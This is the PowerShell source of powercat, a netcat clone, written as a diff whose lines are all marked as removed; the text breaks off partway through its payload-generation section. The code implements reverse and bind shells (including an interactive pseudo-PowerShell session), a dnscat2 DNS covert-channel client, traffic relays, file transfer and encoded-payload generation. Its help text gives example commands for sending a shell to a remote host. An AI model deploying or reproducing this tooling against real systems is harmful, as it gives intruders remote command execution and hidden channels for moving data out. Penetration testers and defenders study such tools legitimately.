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- function powercat
- {
- param(
- [alias("Client")][string]$c="",
- [alias("Listen")][switch]$l=$False,
- [alias("Port")][Parameter(Position=-1)][string]$p="",
- [alias("Execute")][string]$e="",
- [alias("ExecutePowershell")][switch]$ep=$False,
- [alias("Relay")][string]$r="",
- [alias("UDP")][switch]$u=$False,
- [alias("dnscat2")][string]$dns="",
- [alias("DNSFailureThreshold")][int32]$dnsft=10,
- [alias("Timeout")][int32]$t=60,
- [Parameter(ValueFromPipeline=$True)][alias("Input")]$i=$null,
- [ValidateSet('Host', 'Bytes', 'String')][alias("OutputType")][string]$o="Host",
- [alias("OutputFile")][string]$of="",
- [alias("Disconnect")][switch]$d=$False,
- [alias("Repeater")][switch]$rep=$False,
- [alias("GeneratePayload")][switch]$g=$False,
- [alias("GenerateEncoded")][switch]$ge=$False,
- [alias("Help")][switch]$h=$False
- )
- ############### HELP ###############
- $Help = "
- powercat - Netcat, The Powershell Version
- Github Repository:
- This script attempts to implement the features of netcat in a powershell
- script. It also contains extra features such as built-in relays, execute
- powershell, and a dnscat2 client.
- Usage: powercat [-c or -l] [-p port] [options]
- -c <ip> Client Mode. Provide the IP of the system you wish to connect to.
- If you are using -dns, specify the DNS Server to send queries to.
- -l Listen Mode. Start a listener on the port specified by -p.
- -p <port> Port. The port to connect to, or the port to listen on.
- -e <proc> Execute. Specify the name of the process to start.
- -ep Execute Powershell. Start a pseudo powershell session. You can
- declare variables and execute commands, but if you try to enter
- another shell (nslookup, netsh, cmd, etc.) the shell will hang.
- -r <str> Relay. Used for relaying network traffic between two nodes.
- Client Relay Format: -r <protocol>:<ip addr>:<port>
- Listener Relay Format: -r <protocol>:<port>
- DNSCat2 Relay Format: -r dns:<dns server>:<dns port>:<domain>
- -u UDP Mode. Send traffic over UDP. Because it's UDP, the client
- must send data before the server can respond.
- -dns <domain> DNS Mode. Send traffic over the dnscat2 dns covert channel.
- Specify the dns server to -c, the dns port to -p, and specify the
- domain to this option, -dns. This is only a client.
- Get the server here:
- -dnsft <int> DNS Failure Threshold. This is how many bad packets the client can
- recieve before exiting. Set to zero when receiving files, and set high
- for more stability over the internet.
- -t <int> Timeout. The number of seconds to wait before giving up on listening or
- connecting. Default: 60
- -i <input> Input. Provide data to be sent down the pipe as soon as a connection is
- established. Used for moving files. You can provide the path to a file,
- a byte array object, or a string. You can also pipe any of those into
- powercat, like 'aaaaaa' | powercat -c -p 80
- -o <type> Output. Specify how powercat should return information to the console.
- Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'.
- -of <path> Output File. Specify the path to a file to write output to.
- -d Disconnect. powercat will disconnect after the connection is established
- and the input from -i is sent. Used for scanning.
- -rep Repeater. powercat will continually restart after it is disconnected.
- Used for setting up a persistent server.
- -g Generate Payload. Returns a script as a string which will execute the
- powercat with the options you have specified. -i, -d, and -rep will not
- be incorporated.
- -ge Generate Encoded Payload. Does the same as -g, but returns a string which
- can be executed in this way: powershell -E <encoded string>
- -h Print this help message.
- Examples:
- Listen on port 8000 and print the output to the console.
- powercat -l -p 8000
- Connect to port 443, send a shell, and enable verbosity.
- powercat -c -p 443 -e cmd -v
- Connect to the dnscat2 server on, and send dns queries
- to the dns server on port 53.
- powercat -c -p 53 -dns
- Send a file to port 8000.
- powercat -c -p 8000 -i C:\inputfile
- Write the data sent to the local listener on port 4444 to C:\outfile
- powercat -l -p 4444 -of C:\outfile
- Listen on port 8000 and repeatedly server a powershell shell.
- powercat -l -p 8000 -ep -rep
- Relay traffic coming in on port 8000 over tcp to port 9000 on over tcp.
- powercat -l -p 8000 -r tcp:
- Relay traffic coming in on port 8000 over tcp to the dnscat2 server on,
- sending queries to port 53.
- powercat -l -p 8000 -r
- "
- if($h){return $Help}
- ############### HELP ###############
- ############### VALIDATE ARGS ###############
- $global:Verbose = $Verbose
- if($of -ne ''){$o = 'Bytes'}
- if($dns -eq "")
- {
- if((($c -eq "") -and (!$l)) -or (($c -ne "") -and $l)){return "You must select either client mode (-c) or listen mode (-l)."}
- if($p -eq ""){return "Please provide a port number to -p."}
- }
- if(((($r -ne "") -and ($e -ne "")) -or (($e -ne "") -and ($ep))) -or (($r -ne "") -and ($ep))){return "You can only pick one of these: -e, -ep, -r"}
- if(($i -ne $null) -and (($r -ne "") -or ($e -ne ""))){return "-i is not applicable here."}
- if($l)
- {
- $Failure = $False
- netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $p){Write-Output ("The selected port " + $p + " is already in use.") ; $Failure=$True}}
- if($Failure){break}
- }
- if($r -ne "")
- {
- if($r.split(":").Count -eq 2)
- {
- $Failure = $False
- netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $r.split(":")[1]){Write-Output ("The selected port " + $r.split(":")[1] + " is already in use.") ; $Failure=$True}}
- if($Failure){break}
- }
- }
- ############### VALIDATE ARGS ###############
- ############### UDP FUNCTIONS ###############
- function Setup_UDP
- {
- param($FuncSetupVars)
- if($global:Verbose){$Verbose = $True}
- $c,$l,$p,$t = $FuncSetupVars
- $FuncVars = @{}
- $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
- if($l)
- {
- $SocketDestinationBuffer = New-Object System.Byte[] 65536
- $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p
- $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient $p
- $PacketInfo = New-Object System.Net.Sockets.IPPacketInformation
- Write-Verbose ("Listening on [] port " + $p + " [udp]")
- $ConnectHandle = $FuncVars["Socket"].Client.BeginReceiveMessageFrom($SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref]$EndPoint,$null,$null)
- $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- while($True)
- {
- if($Host.UI.RawUI.KeyAvailable)
- {
- if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode))
- {
- Write-Verbose "CTRL or ESC caught. Stopping UDP Setup..."
- $FuncVars["Socket"].Close()
- $Stopwatch.Stop()
- break
- }
- }
- if($Stopwatch.Elapsed.TotalSeconds -gt $t)
- {
- $FuncVars["Socket"].Close()
- $Stopwatch.Stop()
- Write-Verbose "Timeout!" ; break
- }
- if($ConnectHandle.IsCompleted)
- {
- $SocketBytesRead = $FuncVars["Socket"].Client.EndReceiveMessageFrom($ConnectHandle,[ref]([System.Net.Sockets.SocketFlags]::None),[ref]$EndPoint,[ref]$PacketInfo)
- Write-Verbose ("Connection from [" + $EndPoint.Address.IPAddressToString + "] port " + $p + " [udp] accepted (source port " + $EndPoint.Port + ")")
- if($SocketBytesRead -gt 0){break}
- else{break}
- }
- }
- $Stopwatch.Stop()
- $FuncVars["InitialConnectionBytes"] = $SocketDestinationBuffer[0..([int]$SocketBytesRead-1)]
- }
- else
- {
- if(!$c.Contains("."))
- {
- $IPList = @()
- [System.Net.Dns]::GetHostAddresses($c) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | %{$IPList += $_.IPAddressToString}
- Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0])
- $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPList[0])), $p
- }
- else
- {
- $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($c)), $p
- }
- $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient
- $FuncVars["Socket"].Connect($c,$p)
- Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + "...")
- Write-Verbose ("UDP: Make sure to send some data so the server can notice you!")
- }
- $FuncVars["BufferSize"] = 65536
- $FuncVars["EndPoint"] = $EndPoint
- $FuncVars["StreamDestinationBuffer"] = New-Object System.Byte[] $FuncVars["BufferSize"]
- $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
- return $FuncVars
- }
- function ReadData_UDP
- {
- param($FuncVars)
- $Data = $null
- if($FuncVars["StreamReadOperation"].IsCompleted)
- {
- $StreamBytesRead = $FuncVars["Socket"].Client.EndReceiveFrom($FuncVars["StreamReadOperation"],[ref]$FuncVars["EndPoint"])
- if($StreamBytesRead -eq 0){break}
- $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
- $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
- }
- return $Data,$FuncVars
- }
- function WriteData_UDP
- {
- param($Data,$FuncVars)
- $FuncVars["Socket"].Client.SendTo($Data,$FuncVars["EndPoint"]) | Out-Null
- return $FuncVars
- }
- function Close_UDP
- {
- param($FuncVars)
- $FuncVars["Socket"].Close()
- }
- ############### UDP FUNCTIONS ###############
- ############### DNS FUNCTIONS ###############
- function Setup_DNS
- {
- param($FuncSetupVars)
- if($global:Verbose){$Verbose = $True}
- function ConvertTo-HexArray
- {
- param($String)
- $Hex = @()
- $String.ToCharArray() | % {"{0:x}" -f [byte]$_} | % {if($_.Length -eq 1){"0" + [string]$_} else{[string]$_}} | % {$Hex += $_}
- return $Hex
- }
- function SendPacket
- {
- param($Packet,$DNSServer,$DNSPort)
- $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset`nset retry=1`n" + $Packet + "`nexit")
- $result = ($Command | nslookup 2>&1 | Out-String)
- if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)}
- else{return 1}
- }
- function Create_SYN
- {
- param($SessionId,$SeqNum,$Tag,$Domain)
- return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain)
- }
- function Create_FIN
- {
- param($SessionId,$Tag,$Domain)
- return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain)
- }
- function Create_MSG
- {
- param($SessionId,$SeqNum,$AcknowledgementNumber,$Data,$Tag,$Domain)
- return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain)
- }
- function DecodePacket
- {
- param($Packet)
- if((($Packet.Length)%2 -eq 1) -or ($Packet.Length -eq 0)){return 1}
- $AcknowledgementNumber = ($Packet[10..13] -join "")
- $SeqNum = ($Packet[14..17] -join "")
- [byte[]]$ReturningData = @()
- if($Packet.Length -gt 18)
- {
- $PacketElim = $Packet.Substring(18)
- while($PacketElim.Length -gt 0)
- {
- $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16)
- $PacketElim = $PacketElim.Substring(2)
- }
- }
- return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum
- }
- function AcknowledgeData
- {
- param($ReturningData,$AcknowledgementNumber)
- $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535))
- if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)}
- return $Hex
- }
- $FuncVars = @{}
- $FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars
- if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"}
- $FuncVars["Tag"] = ""
- $FuncVars["Domain"] = ("." + $FuncVars["Domain"])
- $FuncVars["Create_SYN"] = ${function:Create_SYN}
- $FuncVars["Create_MSG"] = ${function:Create_MSG}
- $FuncVars["Create_FIN"] = ${function:Create_FIN}
- $FuncVars["DecodePacket"] = ${function:DecodePacket}
- $FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray}
- $FuncVars["AckData"] = ${function:AcknowledgeData}
- $FuncVars["SendPacket"] = ${function:SendPacket}
- $FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
- $FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
- $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
- $FuncVars["Failures"] = 0
- $SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"]))
- $ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))
- $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($ResponsePacket))
- if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."}
- $ReturningData = $DecodedPacket[1]
- if($ReturningData -ne ""){$FuncVars["InputData"] = ""}
- $FuncVars["AckNum"] = $DecodedPacket[2]
- $FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length)
- if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."}
- return $FuncVars
- }
- function ReadData_DNS
- {
- param($FuncVars)
- if($global:Verbose){$Verbose = $True}
- $PacketsData = @()
- $PacketData = ""
- if($FuncVars["InputData"] -ne $null)
- {
- $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"]))
- $SectionCount = 0
- $PacketCount = 0
- foreach($Char in $Hex)
- {
- if($SectionCount -ge 30)
- {
- $SectionCount = 0
- $PacketData += "."
- }
- if($PacketCount -ge ($FuncVars["MaxMSGDataSize"]))
- {
- $PacketsData += $PacketData.TrimEnd(".")
- $PacketCount = 0
- $SectionCount = 0
- $PacketData = ""
- }
- $PacketData += $Char
- $SectionCount += 2
- $PacketCount += 2
- }
- $PacketData = $PacketData.TrimEnd(".")
- $PacketsData += $PacketData
- $FuncVars["InputData"] = ""
- }
- else
- {
- $PacketsData = @("")
- }
- [byte[]]$ReturningData = @()
- foreach($PacketData in $PacketsData)
- {
- try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])}
- catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue }
- try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))}
- catch{ Write-Verbose "DNSCAT2: Failed to send packet." ; $FuncVars["Failures"] += 1 ; continue }
- try
- {
- $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet))
- if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue }
- $FuncVars["AckNum"] = $DecodedPacket[2]
- $FuncVars["SeqNum"] = $DecodedPacket[3]
- $ReturningData += $DecodedPacket[1]
- }
- catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
- if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
- }
- if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break}
- if($ReturningData -ne @())
- {
- $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"]))
- }
- return $ReturningData,$FuncVars
- }
- function WriteData_DNS
- {
- param($Data,$FuncVars)
- $FuncVars["InputData"] = $FuncVars["Encoding"].GetString($Data)
- return $FuncVars
- }
- function Close_DNS
- {
- param($FuncVars)
- $FINPacket = Invoke-Command $FuncVars["Create_FIN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["Tag"],$FuncVars["Domain"])
- Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($FINPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]) | Out-Null
- }
- ############### DNS FUNCTIONS ###############
- ########## TCP FUNCTIONS ##########
- function Setup_TCP
- {
- param($FuncSetupVars)
- $c,$l,$p,$t = $FuncSetupVars
- if($global:Verbose){$Verbose = $True}
- $FuncVars = @{}
- if(!$l)
- {
- $FuncVars["l"] = $False
- $Socket = New-Object System.Net.Sockets.TcpClient
- Write-Verbose "Connecting..."
- $Handle = $Socket.BeginConnect($c,$p,$null,$null)
- }
- else
- {
- $FuncVars["l"] = $True
- Write-Verbose ("Listening on [] (port " + $p + ")")
- $Socket = New-Object System.Net.Sockets.TcpListener $p
- $Socket.Start()
- $Handle = $Socket.BeginAcceptTcpClient($null, $null)
- }
- $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- while($True)
- {
- if($Host.UI.RawUI.KeyAvailable)
- {
- if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode))
- {
- Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..."
- if($FuncVars["l"]){$Socket.Stop()}
- else{$Socket.Close()}
- $Stopwatch.Stop()
- break
- }
- }
- if($Stopwatch.Elapsed.TotalSeconds -gt $t)
- {
- if(!$l){$Socket.Close()}
- else{$Socket.Stop()}
- $Stopwatch.Stop()
- Write-Verbose "Timeout!" ; break
- break
- }
- if($Handle.IsCompleted)
- {
- if(!$l)
- {
- try
- {
- $Socket.EndConnect($Handle)
- $Stream = $Socket.GetStream()
- $BufferSize = $Socket.ReceiveBufferSize
- Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!")
- }
- catch{$Socket.Close(); $Stopwatch.Stop(); break}
- }
- else
- {
- $Client = $Socket.EndAcceptTcpClient($Handle)
- $Stream = $Client.GetStream()
- $BufferSize = $Client.ReceiveBufferSize
- Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $port + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")")
- }
- break
- }
- }
- $Stopwatch.Stop()
- if($Socket -eq $null){break}
- $FuncVars["Stream"] = $Stream
- $FuncVars["Socket"] = $Socket
- $FuncVars["BufferSize"] = $BufferSize
- $FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"])
- $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
- $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
- $FuncVars["StreamBytesRead"] = 1
- return $FuncVars
- }
- function ReadData_TCP
- {
- param($FuncVars)
- $Data = $null
- if($FuncVars["StreamBytesRead"] -eq 0){break}
- if($FuncVars["StreamReadOperation"].IsCompleted)
- {
- $StreamBytesRead = $FuncVars["Stream"].EndRead($FuncVars["StreamReadOperation"])
- if($StreamBytesRead -eq 0){break}
- $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
- $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
- }
- return $Data,$FuncVars
- }
- function WriteData_TCP
- {
- param($Data,$FuncVars)
- $FuncVars["Stream"].Write($Data, 0, $Data.Length)
- return $FuncVars
- }
- function Close_TCP
- {
- param($FuncVars)
- try{$FuncVars["Stream"].Close()}
- catch{}
- if($FuncVars["l"]){$FuncVars["Socket"].Stop()}
- else{$FuncVars["Socket"].Close()}
- }
- ########## TCP FUNCTIONS ##########
- ########## CMD FUNCTIONS ##########
- function Setup_CMD
- {
- param($FuncSetupVars)
- if($global:Verbose){$Verbose = $True}
- $FuncVars = @{}
- $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo
- $ProcessStartInfo.FileName = $FuncSetupVars[0]
- $ProcessStartInfo.UseShellExecute = $False
- $ProcessStartInfo.RedirectStandardInput = $True
- $ProcessStartInfo.RedirectStandardOutput = $True
- $ProcessStartInfo.RedirectStandardError = $True
- $FuncVars["Process"] = [System.Diagnostics.Process]::Start($ProcessStartInfo)
- Write-Verbose ("Starting Process " + $FuncSetupVars[0] + "...")
- $FuncVars["Process"].Start() | Out-Null
- $FuncVars["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536
- $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
- $FuncVars["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536
- $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
- $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
- return $FuncVars
- }
- function ReadData_CMD
- {
- param($FuncVars)
- [byte[]]$Data = @()
- if($FuncVars["StdOutReadOperation"].IsCompleted)
- {
- $StdOutBytesRead = $FuncVars["Process"].StandardOutput.BaseStream.EndRead($FuncVars["StdOutReadOperation"])
- if($StdOutBytesRead -eq 0){break}
- $Data += $FuncVars["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)]
- $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
- }
- if($FuncVars["StdErrReadOperation"].IsCompleted)
- {
- $StdErrBytesRead = $FuncVars["Process"].StandardError.BaseStream.EndRead($FuncVars["StdErrReadOperation"])
- if($StdErrBytesRead -eq 0){break}
- $Data += $FuncVars["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)]
- $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
- }
- return $Data,$FuncVars
- }
- function WriteData_CMD
- {
- param($Data,$FuncVars)
- $FuncVars["Process"].StandardInput.WriteLine($FuncVars["Encoding"].GetString($Data).TrimEnd("`r").TrimEnd("`n"))
- return $FuncVars
- }
- function Close_CMD
- {
- param($FuncVars)
- $FuncVars["Process"] | Stop-Process
- }
- ########## CMD FUNCTIONS ##########
- ########## POWERSHELL FUNCTIONS ##########
- function Main_Powershell
- {
- param($Stream1SetupVars)
- try
- {
- $encoding = New-Object System.Text.AsciiEncoding
- [byte[]]$InputToWrite = @()
- if($i -ne $null)
- {
- Write-Verbose "Input from -i detected..."
- if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
- elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
- elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
- else{Write-Host "Unrecognised input type." ; return}
- }
- Write-Verbose "Setting up Stream 1... (ESC/CTRL to exit)"
- try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
- catch{Write-Verbose "Stream 1 Setup Failure" ; return}
- Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)"
- try
- {
- $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> "))
- $Prompt = ("PS " + (pwd).Path + "> ")
- $CommandToExecute = ""
- $Data = $null
- }
- catch
- {
- Write-Verbose "Stream 2 Setup Failure" ; return
- }
- if($InputToWrite -ne @())
- {
- Write-Verbose "Writing input to Stream 1..."
- try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
- catch{Write-Host "Failed to write input to Stream 1" ; return}
- }
- if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}
- Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
- while($True)
- {
- try
- {
- ##### Stream2 Read #####
- $Prompt = $null
- $ReturnedData = $null
- if($CommandToExecute -ne "")
- {
- try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
- catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
- $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
- }
- $Data += $IntroPrompt
- $IntroPrompt = $null
- $Data += $ReturnedData
- $Data += $Prompt
- $CommandToExecute = ""
- ##### Stream2 Read #####
- if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
- $Data = $null
- }
- catch
- {
- Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
- }
- try
- {
- $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
- if($Data.Length -eq 0){Start-Sleep -Milliseconds 100}
- if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)}
- $Data = $null
- }
- catch
- {
- Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
- }
- }
- }
- finally
- {
- try
- {
- Write-Verbose "Closing Stream 1..."
- Stream1_Close $Stream1Vars
- }
- catch
- {
- Write-Verbose "Failed to close Stream 1"
- }
- }
- }
- ########## POWERSHELL FUNCTIONS ##########
- ########## CONSOLE FUNCTIONS ##########
- function Setup_Console
- {
- param($FuncSetupVars)
- $FuncVars = @{}
- $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
- $FuncVars["Output"] = $FuncSetupVars[0]
- $FuncVars["OutputBytes"] = [byte[]]@()
- $FuncVars["OutputString"] = ""
- return $FuncVars
- }
- function ReadData_Console
- {
- param($FuncVars)
- $Data = $null
- if($Host.UI.RawUI.KeyAvailable)
- {
- $Data = $FuncVars["Encoding"].GetBytes((Read-Host) + "`n")
- }
- return $Data,$FuncVars
- }
- function WriteData_Console
- {
- param($Data,$FuncVars)
- switch($FuncVars["Output"])
- {
- "Host" {Write-Host -n $FuncVars["Encoding"].GetString($Data)}
- "String" {$FuncVars["OutputString"] += $FuncVars["Encoding"].GetString($Data)}
- "Bytes" {$FuncVars["OutputBytes"] += $Data}
- }
- return $FuncVars
- }
- function Close_Console
- {
- param($FuncVars)
- if($FuncVars["OutputString"] -ne ""){return $FuncVars["OutputString"]}
- elseif($FuncVars["OutputBytes"] -ne @()){return $FuncVars["OutputBytes"]}
- return
- }
- ########## CONSOLE FUNCTIONS ##########
- ########## MAIN FUNCTION ##########
- function Main
- {
- param($Stream1SetupVars,$Stream2SetupVars)
- try
- {
- [byte[]]$InputToWrite = @()
- $Encoding = New-Object System.Text.AsciiEncoding
- if($i -ne $null)
- {
- Write-Verbose "Input from -i detected..."
- if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
- elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
- elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
- else{Write-Host "Unrecognised input type." ; return}
- }
- Write-Verbose "Setting up Stream 1..."
- try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
- catch{Write-Verbose "Stream 1 Setup Failure" ; return}
- Write-Verbose "Setting up Stream 2..."
- try{$Stream2Vars = Stream2_Setup $Stream2SetupVars}
- catch{Write-Verbose "Stream 2 Setup Failure" ; return}
- $Data = $null
- if($InputToWrite -ne @())
- {
- Write-Verbose "Writing input to Stream 1..."
- try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
- catch{Write-Host "Failed to write input to Stream 1" ; return}
- }
- if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}
- Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
- while($True)
- {
- try
- {
- $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars
- if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
- if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
- $Data = $null
- }
- catch
- {
- Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
- }
- try
- {
- $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
- if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
- if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars}
- $Data = $null
- }
- catch
- {
- Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
- }
- }
- }
- finally
- {
- try
- {
- #Write-Verbose "Closing Stream 2..."
- Stream2_Close $Stream2Vars
- }
- catch
- {
- Write-Verbose "Failed to close Stream 2"
- }
- try
- {
- #Write-Verbose "Closing Stream 1..."
- Stream1_Close $Stream1Vars
- }
- catch
- {
- Write-Verbose "Failed to close Stream 1"
- }
- }
- }
- ########## MAIN FUNCTION ##########
- ########## GENERATE PAYLOAD ##########
- if($u)
- {
- Write-Verbose "Set Stream 1: UDP"
- $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
- $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
- $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
- $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")
- if($l){$InvokeString = "Main @('',`$True,'$p','$t') "}
- else{$InvokeString = "Main @('$c',`$False,'$p','$t') "}
- }
- elseif($dns -ne "")
- {
- Write-Verbose "Set Stream 1: DNS"
- $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
